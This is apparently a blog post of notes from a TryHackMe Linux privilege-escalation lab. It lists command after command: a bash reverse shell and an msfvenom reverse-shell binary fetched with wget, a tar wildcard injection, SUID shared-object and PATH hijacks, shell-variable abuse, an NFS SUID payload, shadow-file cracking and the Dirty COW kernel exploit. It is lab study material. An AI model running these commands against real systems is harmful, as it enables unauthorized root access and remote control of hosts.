Linux Privilege Escalation from tryhackme

1.Service Exploits

gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root

2. Weak File Permissions (Readable /etc/shadow file)

Here, we are assuming a scenario that the /etc/shadow file is readable by the user.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

3. Weak File Permissions (Writable /etc/shadow file)

In this scenario, we are assuming that the user has write access to the /etc/shadow file.

sudo mkpasswd -m sha-512 newpass123

4. Weak File Permissions (Writable /etc/passwd file)

In this scenario, we are assuming that the /etc/passwd file is writable, By default it is only writable by the root user.

5. Sudo shell escape sequences

In this scenario, we are assuming that the user has sudo access to certain unix binaries. Lets find out what are those

sudo -l

6. cron jobs — File Permissions

In this scenario, we assume that the file permissions on cron jobs are weakly configured.

cat /etc/crontab
locate overwrite.sh
ls -l /usr/local/bin/overwrite.sh
bash -i >& /dev/tcp/10.9.0.56/5566 0>&1

7. cron jobs — PATH Environment Variables

In this scenario, we are assuming that the path environment variable is set to /home/user

cd /home/user
#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
chmod +x /home/user/overwrite.sh
/tmp/rootbash -p

8. cron jobs — Wildcards

In this scenario we will abuse the wildcards functionality in linux, there is a cron job compress.sh that is running the below command

tar czf /tmp/backup.tar.gz *
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
msfvenom -l payloads | grep linux
user@debian:~$ uname -a
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 GNU/Linux
msfvenom --list formats
sudo msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.9.0.56 LPORT=5555 -f elf -o shell.elf
sudo python3 -m http.server 9999
wget http://10.9.0.56:9999/shell.elf
nc -nlvp 5555
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf

9. SUID /SGID Executables Known Exploits

In this scenario, we assume that the suid executable is running at version that is affected with a known exploit.

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

10. SUID /SGID Shared Objects Injection

In this scenario, we assume that the suid executable is vulnerable to “shared object injection”.

lse.sh -l 1 -i | more
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"
mkdir .config
cd .config
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));void inject() {
system("/bin/bash -p");
}Compile the .c file to create .so file
gcc -shared -fPIC -o libcalc.so libcalc.c
gcc -shared -fPIC -o libcalc.so libcalc.c
/usr/local/bin/suid-so

SUID /SGID Environment Variables

Lets find out the files running with suid bit set

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strings /usr/local/bin/suid-env
strace -v -f -e execve /usr/local/bin/suid-env 2>&1 | grep service
service.cint main() {setuid(0);system(“/bin/bash -p”);}
gcc -o service service.c
PATH=.:$PATH /usr/local/bin/suid-env

Abusing Shell Features (Vulnerable shell that allows forward slashes in function name)

In this scenario, we assume that the server is running a shell of older version (4.1) which has vulnerabilities associated with it.

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
/usr/local/bin/suid-env2
strace -v -f -e execve /usr/local/bin/suid-env 2>&1 | grep service
/bin/sh --version
function /usr/sbin/service { "/bin/sh" -p; }
export -f /usr/sbin/service
/usr/local/bin/suid-env2

Abusing Shell Features (Vulnerable shell that displays prompt through a variable in debug mode)

Find the files running with suid bit,

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strace -v -f -e execve /usr/local/bin/suid-env 2>&1 | grep service
/bin/bash --version
env -i SHELLOPTS=xtrace PS4=test /usr/local/bin/suid-env2
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
/tmp/rootbash -p
cat ~/.*history | less
su root 

Password stored in Config Files

In this scenario, we assume that the passwords and keys are stored in the configuration files.

SSH Keys stored insecurely

In this scenario, we assume that the user has stored his / her ssh private key insecurely.

ls -al /
ls -l /.ssh
cat /.ssh/root_key
cat /.ssh/root_key
vi root_key
chmod 600
ssh -i root_key root@10.10.121.113

Abusing NFS Vulnerability

./lse.sh -l 1 
showmount -e <victim ip>
mkdir /tmp/nfs
mount -o rw,vers=2 10.10.41.239:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf
/tmp/shell.elf

Kernel Exploits

In this scenario, we try to exploit the application with kernel exploit.

perl /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl
gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
./c0w
/usr/bin/passwd
mv /tmp/bak /usr/bin/passwd
exit

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store